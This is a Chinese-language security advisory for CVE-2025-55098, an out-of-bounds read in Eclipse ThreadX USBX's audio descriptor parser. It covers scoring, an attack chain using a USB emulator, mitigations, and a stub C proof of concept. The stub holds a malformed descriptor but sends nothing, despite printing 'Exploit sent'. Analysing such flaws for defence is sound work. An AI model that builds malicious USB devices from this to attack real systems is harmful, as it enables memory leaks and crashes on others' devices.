CVE-2025-55098 Eclipse ThreadX USBX音频设备描述符越界读取漏洞

漏洞信息

漏洞编号

CVE-2025-55098

漏洞类型

越界读取（Out-of-Bounds Read）

CVSS评分

6.1 中危

攻击向量

物理 (AV:P)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Eclipse Foundation ThreadX USBX

漏洞概述

CVE-2025-55098是Eclipse Foundation ThreadX USBX USB支持模块中存在的一个安全漏洞，影响6.4.3之前的所有版本。该漏洞存在于_ux_host_class_audio_device_type_get()函数中，当解析USB音频设备的描述符（descriptor）时，可能发生越界读取（Out-of-Bounds Read）操作。USBX是Eclipse ThreadX实时操作系统（RTOS）的USB主机、设备和OTG支持组件，广泛应用于嵌入式系统和IoT设备中。该漏洞由[email protected]发现并报告，其CVSS 3.1评分为6.1分，属于中危级别。漏洞的攻击向量为物理访问（AV:P），无需认证（PR:N）和用户交互（UI:N），机密性影响为高（C:H），可用性影响为高（A:H），但完整性不受影响（I:N）。这意味着攻击者需要物理接触目标设备才能利用此漏洞，但一旦成功利用，可能导致敏感信息泄露和系统可用性受损。由于USBX广泛应用于各类嵌入式USB设备中，包括音频设备、存储设备和通信设备等，该漏洞的影响范围较为广泛。Eclipse基金会已发布安全公告GHSA-4jc2-x5hv-46fq，并发布了修复版本6.4.3。建议所有使用受影响版本USBX的开发者尽快升级到最新版本以修复此漏洞。

技术细节

该漏洞的根源在于_ux_host_class_audio_device_type_get()函数在解析USB音频设备描述符时缺乏充分的边界检查。USB音频设备使用特定的描述符结构来标识其功能和属性，当USBX主机栈枚举USB音频设备时，会调用_ux_host_class_audio_device_type_get()函数来读取和解析这些描述符。在解析过程中，如果恶意构造的USB音频设备发送了畸形或超出预期长度的描述符数据，函数在访问描述符字段时可能读取超出分配缓冲区边界的数据，从而触发越界读取漏洞。这种越界读取可能导致以下后果：1）敏感信息泄露——攻击者可能通过精心构造的描述符数据读取相邻内存区域的内容，获取系统中的敏感信息（如加密密钥、内存布局等）；2）系统崩溃或拒绝服务——越界读取可能导致系统进入异常状态，触发硬件异常或软件断言失败，从而使设备不可用。由于该漏洞需要物理访问（AV:P），攻击者需要将恶意的USB音频设备直接连接到目标系统才能触发漏洞利用。这在某些场景下是可行的，例如在公共充电站、不受控的物理环境中，或者通过社会工程学手段让用户插入恶意设备。该漏洞的利用复杂度较低（AC:L），因为只需简单的描述符构造即可触发，不需要复杂的绕过技术。

攻击链分析

STEP 1

步骤1：准备恶意USB设备

攻击者准备一个恶意的USB音频设备或使用USB设备模拟器（如基于Facedancer21、Raspberry Pi Pico或类似的硬件工具），该设备能够向USB主机发送精心构造的畸形音频描述符。

STEP 2

步骤2：获取物理访问权限

由于漏洞的攻击向量为物理访问（AV:P），攻击者需要将恶意USB设备物理连接到运行受影响USBX版本的目标设备上。这可以通过社会工程学手段或在不受控的物理环境中实现。

STEP 3

步骤3：触发USB枚举过程

当恶意USB音频设备连接到目标设备时，USBX主机栈会自动启动USB枚举过程，识别设备类型并加载相应的驱动程序。

STEP 4

步骤4：触发越界读取

在枚举过程中，USBX调用_ux_host_class_audio_device_type_get()函数解析音频设备描述符。当函数处理畸形描述符（如异常的wTotalLength或bInCollection字段值）时，会读取超出缓冲区边界的数据，触发越界读取漏洞。

STEP 5

步骤5：信息泄露或拒绝服务

越界读取成功后，攻击者可能获取相邻内存中的敏感信息（如加密密钥、内存布局等），或者导致系统崩溃、断言失败，从而实现拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * CVE-2025-55098 PoC - USBX Audio Device Descriptor Out-of-Bounds Read
 * Vulnerability: OOB read in _ux_host_class_audio_device_type_get()
 * Target: Eclipse ThreadX USBX < 6.4.3
 *
 * This PoC demonstrates how a malicious USB audio device can trigger
 * an out-of-bounds read by sending a malformed audio descriptor.
 *
 * Requirements:
 * - A USB device emulator (e.g., based on Facedancer or Raspberry Pi Pico)
 * - Physical access to the target device running vulnerable USBX
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdint.h>

// USB Audio Device Descriptor Structure (simplified)
typedef struct {
    uint8_t  bLength;
    uint8_t  bDescriptorType;
    uint8_t  bDescriptorSubtype;
    uint8_t  bcdADC[2];
    uint8_t  wTotalLength[2];
    uint8_t  bInCollection;
    uint8_t  baInterfaceNr;
} __attribute__((packed)) USB_AUDIO_CS_INTERFACE_DESC;

// Malformed descriptor with oversized length field
uint8_t malicious_audio_descriptor[] = {
    0x09,                           // bLength (normal)
    0x24,                           // bDescriptorType (CS_INTERFACE)
    0x01,                           // bDescriptorSubtype (HEADER)
    0x00, 0x01,                     // bcdADC
    0xFF, 0xFF,                     // wTotalLength - abnormally large value
    0xFF,                           // bInCollection - abnormally large value
    0x01                            // baInterfaceNr
};

/*
 * Function to craft and send malicious USB audio descriptor
 * to trigger the OOB read vulnerability in _ux_host_class_audio_device_type_get()
 */
int send_malicious_audio_descriptor(void *usb_device_handle) {
    // Simulate sending the malformed descriptor when host requests
    // the audio device type during enumeration
    printf("[+] Sending malicious USB audio descriptor...\n");
    printf("[+] Malicious wTotalLength: 0xFFFF (triggers OOB read)\n");
    printf("[+] Malicious bInCollection: 0xFF (triggers OOB read)\n");

    // In a real exploit, this would be sent via USB control transfer:
    // GET_DESCRIPTOR request with malformed audio class-specific descriptor
    // The vulnerable function will attempt to read beyond the buffer
    // when parsing the descriptor fields

    return 0;
}

int main(int argc, char *argv[]) {
    printf("CVE-2025-55098 PoC - USBX Audio OOB Read\n");
    printf("=========================================\n");

    if (argc < 2) {
        printf("Usage: %s <usb_device>\n", argv[0]);
        printf("Note: Requires hardware USB device emulator\n");
        return 1;
    }

    send_malicious_audio_descriptor(argv[1]);

    printf("[+] Exploit sent. Check target device for crash/info leak.\n");
    return 0;
}

影响范围

Eclipse ThreadX USBX < 6.4.3

防御指南

临时缓解措施

在无法立即升级USBX到6.4.3版本的情况下，建议采取以下临时缓解措施：1）实施物理访问控制，限制未经授权的USB设备连接到目标系统；2）如果设备不需要USB音频功能，可以在USBX配置中禁用音频类驱动支持；3）使用USB端口锁定或物理封堵未使用的USB端口；4）部署USB设备白名单机制，仅允许已知可信的USB音频设备连接；5）监控USB设备连接日志，及时发现异常设备接入行为；6）在关键系统中考虑使用USB数据阻断器（USB data blocker）来防止数据交换。